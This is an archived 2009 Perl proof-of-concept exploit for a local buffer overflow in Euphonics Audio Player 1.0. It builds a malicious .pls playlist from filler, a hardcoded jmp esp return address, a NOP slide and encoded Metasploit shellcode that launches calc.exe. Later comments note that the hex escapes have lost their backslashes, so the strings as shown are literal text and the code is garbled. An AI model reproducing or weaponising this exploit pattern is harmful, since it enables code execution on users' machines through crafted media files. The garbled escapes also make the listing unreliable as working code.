
# Title : Euphonics Audio Player 1.0 (.pls) Universal Local Buffer Overflow Exploit
# Published : 2009-02-04
# Author : Houssamix


#!/usr/bin/perl -w
#-----------------------------------------------------------------------------
# Author : Houssamix

# Euphonics Audio Player v1.0 (.pls) Universal Local Buffer Overflow Exploit
# Gr33tz to : str0ke , real-power.net , Legend-spy - stack 

# thx to h4ck3r#47 for the first exploit http://milw0rm.com/exploits/7958
# only the return address is changed, to make the exploit universal

#-----------------------------------------------------------------------------
# Assembles the malformed playlist this proof-of-concept describes — filler,
# a 4-byte return address, a NOP slide and a payload, concatenated in that
# order — and appends it to a .pls file in the current directory.
#
# NOTE(review): in this copy of the listing the Perl hex escapes appear to
# have lost their backslashes ("x41" rather than an escape sequence), so as
# written every string below is literal ASCII text, not the byte values the
# comments describe.  Anyone matching on the file this script produces
# should expect the literal text form.
my $overflow = "x41" x 1324;  # filler: 1324 repetitions of the literal "x41"
my $ret = "xCBxA3x0Fx10"; # jmp esp from AdjMmsEng.dll <= the address the author calls universal
my $nop = "x90" x 100 ;  # intended NOP slide (100 repetitions)

# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com/
# The line above is the author's description of the payload string that
# follows (a calc.exe launcher, encoded); the string itself is opaque here.
my $shellcode =
"x31xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13x34".
"x92x42x83x83xebxfcxe2xf4xc8x7ax06x83x34x92xc9xc6".
"x08x19x3ex86x4cx93xadx08x7bx8axc9xdcx14x93xa9xca".
"xbfxa6xc9x82xdaxa3x82x1ax98x16x82xf7x33x53x88x8e".
"x35x50xa9x77x0fxc6x66x87x41x77xc9xdcx10x93xa9xe5".
"xbfx9ex09x08x6bx8ex43x68xbfx8exc9x82xdfx1bx1exa7".
"x30x51x73x43x50x19x02xb3xb1x52x3ax8fxbfxd2x4ex08".
"x44x8exefx08x5cx9axa9x8axbfx12xf2x83x34x92xc9xeb".
"x08xcdx73x75x54xc4xcbx7bxb7x52x39xd3x5cx62xc8x87".
"x6bxfaxdax7dxbex9cx15x7cxd3xf1x23xefx57xbcx27xfb".
"x51x92x42x83";

my $file="hsmx.pls";  # output playlist name, relative to the working directory

# No `use strict` in this script, so $exploit is an undeclared package global.
$exploit = $overflow.$ret.$nop.$shellcode;
# Two-argument open in append mode (">>"): each run grows the same file
# instead of replacing it.  The mode is parsed out of the string, which is
# harmless with a fixed name like this one but is why 3-arg open is preferred.
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $exploit ;
close($FILE);   # close result is not checked; a buffered write error would go unnoticed
print "Done n";   # the newline escape is also missing its backslash in this copy

# www.Syue.com [2009-02-04]